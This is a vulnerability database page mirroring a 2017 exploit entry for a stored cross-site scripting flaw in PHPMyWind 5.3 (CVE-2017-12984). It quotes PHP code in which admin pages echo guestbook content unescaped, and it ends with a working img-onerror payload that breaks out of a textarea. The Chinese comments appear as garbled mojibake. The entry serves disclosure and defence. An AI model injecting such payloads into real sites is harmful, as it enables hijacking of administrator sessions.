Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPacket StormPACKETSTORM:143855
HistoryAug 21, 2017 - 12:00 a.m.

PHPMyWind 5.3 Cross Site Scripting

2017-08-2100:00:00
Packet Storm
packetstormsecurity.com
21

0.001 Low

EPSS

Percentile

45.9%

JSON
`Exploit Titlei1/4PHPMyWind 5.3 has XSS  
Exploit Author:adege"  
Vendor Homepage:http://phpmywind.com  
Software Link:http://phpmywind.com/downloads/PHPMyWind_5.3.zip  
Version:5.3  
CVE:CVE-2017-12984  
  
  
$r= $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`");  
$orderid= (empty($r['orderid']) ? 1 : ($r['orderid'] + 1));  
$nickname= htmlspecialchars($nickname);//ae,,a(r)C/(xxx)  
$contact= htmlspecialchars($contact); //ec3>>ae1a1/4  
$content= htmlspecialchars($content); //ce"aa(r)1  
  
$posttime= GetMkTime(time());  
$ip= gethostbyname($_SERVER['REMOTE_ADDR']);  
  
  
$sql= "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')";  
if($dosql->ExecNoneQuery($sql))  
{  
ShowMsg('ce"aeai1/4aeedegC/ae"cae-aei1/4','message.php');  
exit();  
}  
}  
a-a>>Y=caoa1/2?c"htmlspecialcharse?e!e?ae>>$?,a,|aY=aoa,.  
e*e?contentaaedega  
127.0.0.1/PHPMyWind_5.3/admin/ message_update.php  
<?php require_once(dirname(__FILE__).'/inc/config.inc.php');IsModelPriv('message'); ?>  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<title>a?(r)ae1ce"</title>  
<link href="templates/style/admin.css" rel="stylesheet" type="text/css" />  
<script type="text/javascript" src="templates/js/jquery.min.js"></script>  
<script type="text/javascript" src="templates/js/checkf.func.js"></script>  
<script type="text/javascript" src="editor/kindeditor-min.js"></script>  
<script type="text/javascript" src="editor/lang/zh_CN.js"></script>  
</head>  
<body>  
<?php  
$row = $dosql->GetOne("SELECT * FROM `#@__message` WHERE `id`=$id");  
?>  
<div class="formHeader"> <span class="title">a?(r)ae1ce"</span> <a href="javascript:location.reload();" class="reload">a*aedeg</a> </div>  
<form name="form" id="form" method="post" action="message_save.php">  
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="formTable">  
<tr>  
<td width="25%" height="40" align="right">c"ae*ai1/4</td>  
<td width="75%"><strong><?php echo $row['nickname'] ?></strong></td>  
</tr>  
<tr>  
<td height="40" align="right">ec3>>ae1a1/4i1/4</td>  
<td><input type="text" name="contact" id="contact" class="input" value="<?php echo $row['contact'] ?>" /></td>  
</tr>  
<tr>  
<td height="198" align="right">ce"aa(r)1i1/4</td>  
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>  
<script>  
  
  
p:33  
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>  
  
aadegc'aeY=aaocontentaaedeg,aedegae(r)a1Paeae?e!e1/2!a1aea1/2a  
  
  
EXP: a><img/src=x onerror=alert(2001)><aa  
  
`

Related

zdt 1
prion 1
cvelist 1
cve 1
exploitpack 1
nvd 1
exploitdb 1
zdt
zdt
PHPMyWind 5.3 - Cross-Site Scripting Vulnerability
2017-08-21 00:00:00
prion
prion
Design/Logic Flaw
2017-08-21 07:29:00
cvelist
cvelist
CVE-2017-12984
2017-08-21 07:00:00
cve
cve
CVE-2017-12984
2017-08-21 07:29:00
exploitpack
exploitpack
PHPMyWind 5.3 - Cross-Site Scripting
2017-08-21 00:00:00
nvd
nvd
CVE-2017-12984
2017-08-21 07:29:00
exploitdb
exploitdb
PHPMyWind 5.3 - Cross-Site Scripting
2017-08-21 00:00:00

0.001 Low

EPSS

Percentile

45.9%

JSON
Related for PACKETSTORM:143855
zdt1prion1cvelist1cve1exploitpack1nvd1exploitdb1